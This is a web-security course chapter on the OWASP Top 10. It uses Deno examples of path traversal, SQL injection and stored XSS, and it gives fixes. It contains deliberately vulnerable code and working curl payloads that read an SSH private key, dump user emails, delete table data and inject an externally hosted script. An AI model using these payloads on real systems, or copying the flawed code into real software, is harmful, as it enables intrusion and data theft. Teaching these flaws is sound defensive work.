Users and Security

Web Security Basics

Learning Objectives

You know of some of the most common security risks in web applications.
You know where to find more information on web application security.

Plenty of websites are hacked every day. As flaws in web applications (and other applications) are continuously being sought by malicious users and organizations, it is not surprising that there is a cybersecurity workforce shortage. It is important that everyone who develops software knows at least the basics of building secure software, and knows how to maintain secure software.

The recent emergence of Generative AI in software engineering has not made the situation any easier. Generative AI systems may produce code with security flaws, but an extra problem is that users of such systems are biased towards trusting the outputs, even if the outputs are flawed.

For additional information, see e.g. the part Software Security and Large Language Models of the Software Engineering with Large Language Models course.

Most common issues with application security are related to developers’ lack of awareness or rigor as well as poor development practices. Developers may unintentionally leave bugs into their applications which allow attacks towards the application or the users of the application. Developers may store sensitive information, such as passwords, in insecure locations like plaintext files or unencrypted databases that can be accessed or breached, and they may not actively keep the used libraries and other software up to date to mitigate arising security concerns. They may even — as an example — host applications on a server that has other software with security flaws, which can lead to attacks through flaws in other software.

It is not just the developers, but the companies responsible for building the software and the companies buying the software. Resources need to be allocated to keep software secure, as new security issues keep emerging.

The Open Web Application Security Project® (OWASP) foundation works to improve software security and to provide resources for learning about securing web applications. They also maintain a guide on Web Application Security Testing and keep track of the (current) most critical security risks in web applications.

Here, we visit a few of the most common security risks in web applications. The list is based on the OWASP Top 10, which is a list of the ten most critical security risks in web applications.

Broken access control

Here, we look into an instance of broken access control and its implications. Using Vanilla Deno, we create an application that responds with a file based on the url in the request. In principle, such an application would be meaningful, as it would allow responding with e.g. any HTML documents in the current folder.

The folder structure of our application is as follows.

tree
.
├── app.js
└── index.html

0 directories, 2 files

The contents of the app.js are as follows, and the index.html is a simple HTML page.

Note that the following code is not secure and should never be used in a production environment.

const handleRequest = async (request) => {
  const url = new URL(request.url);
  const path = url.pathname.slice(1);

  return new Response(await Deno.readTextFile(path));
};

Deno.serve(handleRequest);

The application reads the request url (i.e. the path) and responds with the file given in the path. In the code, as the pathname variable in the request object has a slash / prefix, the slice-function is used to remove the first character in the path to allow asking for files in the present folder.

The application serves files within the current folder nicely. For example, retrieving an index.html-page works, given that the application has been launched from the same folder where the index.html file resides.

curl http://localhost:8000/index.html
<!DOCTYPE html>
<html>
  <head>
    <title>Title</title>
  </head>
  <body>
    <h1>Hello world!</h1>
    <p>Oh noes, what an epic failure.</p>
  </body>
</html>%

In practice, we could also add other files to the folder, which would lead to a situation where our server serves the files whenever they are requested.

The question then is as follows: So, what’s wrong with this application and why should something like this never be done?

To answer the question, let’s look at what other things we could try to request. We can, obviously, request any file in the folder of the application, including the code that runs the application.

curl http://localhost:8000/app.js
const handleRequest = async (request) => {
  const url = new URL(request.url);
  const path = url.pathname.slice(1);

  return new Response(await Deno.readTextFile(path));
};

Deno.serve(handleRequest);

Because there are no limitations to the files that can be requested, and the only check is removing the first slash in the pathname, we can also try to access files in other folders. Adding a double slash to the path will lead to a situation where only the first slash is removed, which will allow digging into the file system.

As an example, we could try to guess that there exists a user called “server” and try to to access, say, the git configuration file .gitconfig.

curl http://localhost:8000//home/server/.gitconfig
(real content from the config file)

Similarly, in Dockerized applications, the folder /app is often used as the directory for the application.

Gaining access to the .gitconfig means that we likely have access to other files that should not be accessible. Let’s take a peek at the ssh configuration files that are used to secure connections between computers.

curl http://localhost:8000//home/server/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: [content]
DEK-Info: [content]

[content]
-----END RSA PRIVATE KEY-----

Well. Oops. Now this could lead to a bunch of problems.. We surely do not wish that anyone has access to our private keys, or, to any other private content.

Loading Exercise...

The above example illustrates why it is important to not allow access to files that should not be accessed. In the example, the application should have been limited to serving only the files in the current folder, and — in addition — the application should have been limited to serving only files that are allowed to be served. In practice, this would mean that the application should have been limited to serving only the index.html file.

There were also other problems, such as exposing private keys on a server accessible via the internet, which should never be done. The private keys should be stored in a secure location, and — in the case of ssh keys — the keys should be password protected.

When using Deno, we can use the --allow-read to provide folder-specific permissions that would create another safeguard for mistakes like the above. For additional details, see the chapter on security and permissions in Deno documentation.

Injection flaws

Injection flaws allow an attacker to inject malicious code to the application. In the case of an injection flaw, the injected code is executed in a context where it should not be executed such as the database or the command prompt of the operating system. Giving the possibility to execute code allows the attacker to e.g. access data without authentication or authorization, to create new processes on the server, and — in the worst case — take full control of the server.

Injection flaws are typically related to processing forms or other content that is sent to the server. As an example, one possible flaw could allow the user of the application to add evil code through a login form, which then — when the form is submitted — would cause havoc on the server.

Loading Exercise...

One family of injection flaws are SQL injection flaws. In practice, SQL injection flaws create an opportunity for the user to execute arbitrary SQL commands on the server. This flaw is typically a product of poorly sanitized input data and not using parameterized queries. As an example, if the used database driver would allow adding strings to the query as is, a programmer could implement a database query used for inserting data to the database as follows (the following example outlines working with a table called names).

const createName = async (name) => {
  // NEVER EVER DO THIS:
  const query = "INSERT INTO names (name) VALUES ('" + name + "')";
  // assuming that the query would be executed next
};

The question then is as follows: So, where is the flaw — and if there is one, it must be just a small thing, right?

The following example is intended for educational purposes only — exploiting such vulnerabilities without permission is illegal and unethical.

The following example demonstrates what a single SQL injection flaw can lead to. We start by using an API that uses the above code to add data to the database as it should be used — when we POST a name to the database, everything seems to be in order.

curl -X POST -d "name=Hello" http://localhost:8000
curl http://localhost:8000
[{"id":81,"name":"Hello"}]%

Knowing some SQL, with guessing and trickery, we test whether we can insert multiple names.

curl -X POST -d "name=Hello2'),('Hello3'),('Hello4?" http://localhost:8000
curl http://localhost:8000
[{"id":81,"name":"Hello"},{"id":82,"name":"Hello2"},{"id":83,"name":"Hello3"},{"id":84,"name":"Hello4?"}]%

Oh, yes we can! At this point, we would know that the application is likely doomed. After some time spent on trying different table names (omitted here), we figure out the name of the database table that the API uses — in this case it is names — and that the table has a column called name. In addition, the GET request to the API lists the contents of the names table. Now, the world is ours.

We continue by figuring out all the the database tables. In the following example, using the SQL injection flaw, we read all the table names from the database and insert them into the table names. This is followed by reading the table names using the API. The -- at the end is the start of a comment, leading to the situation where the SQL code after the injected value is ignored, and no syntax error will occur.

curl -X POST -d "name=I am so sorry.'); INSERT INTO names (name) SELECT table_name FROM information_schema.tables WHERE table_schema = 'public';-- -" http://localhost:8000
curl http://localhost:8000
[{"id":289,"name":"I am so sorry."},{"id":290,"name":"names"},{"id":291,"name":"songs"},{"id":292,"name":"messages"},{"id":293,"name":"news"},{"id":294,"name":"users"}, ..]%

Then, once we have figured out the table names, we look into table columns. In the following example, we read the columns of a table called users that we just found that existed in the database.

curl -X POST -d "name=I am so sorry.'); INSERT INTO names (name) SELECT column_name FROM information_schema.columns WHERE table_name = 'users';-- -" http://localhost:8000
curl http://localhost:8000
[{"id":301,"name":"I am so sorry."},{"id":302,"name":"id"},{"id":303,"name":"email"},{"id":304,"name":"password"},...]%

Now that we know the column names of the users table, we can — for example — expose and download all the emails in the database.

curl -X POST -d "name=I am so sorry.'); INSERT INTO names (name) SELECT email FROM users;-- -" http://localhost:8000
curl http://localhost:8000
[...,{"id":306,"name":"my@email.net"},{"id":307,"name":"email@email.net"},{"id":308,"name":"mail@mail.net"},{"id":309,"name":"my@mail.net"},{"id":310,"name":"secret@email.net"},...]%

Similarly, we could also download the passwords of the users, as the table users has a column called password. And, well, we could naturally do other not so nice things. We could, for example, delete all the data in the database. In the following example, we delete all the data from the table names.

curl -X POST -d "name=I am so sorry.'); DELETE FROM names;-- -" http://localhost:8000
curl http://localhost:8000
[]%

As we can see above, the response from the API is empty and the database has been cleared.

So, where did this SQL injection flaw come from? It stemmed from the possibility of inserting code to the SQL query.

  // NEVER EVER DO THIS:
  const query = "INSERT INTO names (name) VALUES ('" + name + "')";
  // assuming that the query would be executed next

As we observed from the example above, if there is even a single such place in an application, the whole data can be compromised. The basic approach that we have taken so far to prevent this is the use of query parameters through Postgres.js, i.e. writing queries as follows.

// ...
await sql`INSERT INTO names (name) VALUES (${name})`;
// ...

This way, Postgres.js preprocesses the query, distinguishing between SQL code and parameters. All parameters are handled as values (not SQL code). Even if we would add SQL code into a parameter, it would be handled as a string and not something that should be executed.

Exploits of a Mom

Now, the following XKCD comic “Exploits of a Mom” should make plenty of sense.

Loading Exercise...

Cross-site scripting

Cross-site scripting (XSS) is a specific type of injection attack found in web applications. In cross-site scripting, the site provides an attacker the possibility of injecting client-side scripts into the application, which are then executed on other users’ computers as they access the application.

The starting point of an XSS attack is injecting code to the application. This can be done through, for example, a form or an API endpoint. Contrary to SQL injection and other injection flaws, cross-site scripting does not lead to the code being executed on the server. The server simply stores the code.

Once the code is stored on the server, the server compromises its users. Whenever a user requests content from the server that has the malicious code, the server responds to the request normally, sending the content to the user. Now, when the user retrieves the content with the malicious code, the content will be processed by the browser and the code will be executed. This can, for example, lead to the browser crashing, or to worse effects such as compromising content stored within the browser.

Loading Exercise...

As an example, if an application would construct a response based on data in the database, without looking at the content, this would lead to the possibility for a malicious user to inject client-side scripts to the output shown to other users.

// app

const getNamesHtml = async () => {
  const rows = await sql`SELECT * FROM names`;

  const names = rows
    .map((o) => `<li>${o.name}</li>`)
    .reduce((acc, o) => acc + o + "\n", "");

  return `<html>
    <body>
      <ul>
        ${names}
      </ul>
    </body>
  </html>`;
};

// using the above function to create a response and send it to the user

Let’s see how this could be exploited, given that there would be a possibility to add information e.g. via a form. The example below shows that when we make a query to the application, we see a list of names. In this case, there is just one name in the database.

curl http://localhost:8000
<html>
  <body>
    <ul>
      <li>Hello!</li>
    </ul>
  </body>
</html>%

Let’s add a new name. We try out if we could emphasize the name by adding a strong element around the name.

curl -X POST -d "name=<strong>Test</strong>" http://localhost:8000
curl http://localhost:8000
<html>
  <body>
    <ul>
      <li>Hello!</li>
<li><strong>Test</strong></li>
    </ul>
  </body>
</html>%

We can! Yay! Any user accessing the application using a browser will see the name Test emphasized.

This may mean that we can inject any content to the site — including JavaScript. In the next example, we try injecting a JavaScript file loaded from an external address to the site. As an example, we use the code at:

https://gist.githubusercontent.com/avihavai/c91260e5856eae21a0fbad1f2b891895/raw/336cdd0d85e48c42e53563938495e34fbccb6f00/injection-example.js

If successful, browsers of users accessing the site would load the script and execute it after page load. This would allow the attacker, for example, to replace the site content with something else, to place a keylogger to the site, to mine bitcoins with the users’ computers, and, possibly, create harm for the user on other sites as well.

curl -X POST -d "name=<script src='(path from above)' defer></script>" http://localhost:8000
curl http://localhost:8000
<html>
  <body>
    <ul>
      <li>Hello!</li>
<li><strong>Test</strong></li>
<li><script src='(path from above)' defer></script></li>
    </ul>
  </body>
</html>%

So, where did this cross-site scripting flaw come from? It stemmed from the possibility of inserting non-escaped HTML code to the page. When retrieving data from the database, characters indicating the start and end of HTML elements were not escaped, which led to the elements being interpreted as normal HTML.

// ...
  const names = rows
      .map(o => `<li>${o.name}</li>`)
      .reduce((acc, o) => acc + o + "\n", "");

  response.body = `<html>
    <body>
      <ul>
        ${names}
      </ul>
    </body>
  </html>`;
// ...

One way to solve this is to special characters such as <, >, &, and " to prevent unintended HTML or JavaScript execution.

Again, if there is even a single such place in an application, other users of the application can be compromised. While the above example shows a simple example where HTML content is created on the server, the same flaw can occur also in e.g. sites created with Eta or with sites where the content is retrieved from an API with JavaScript and then shown on the page.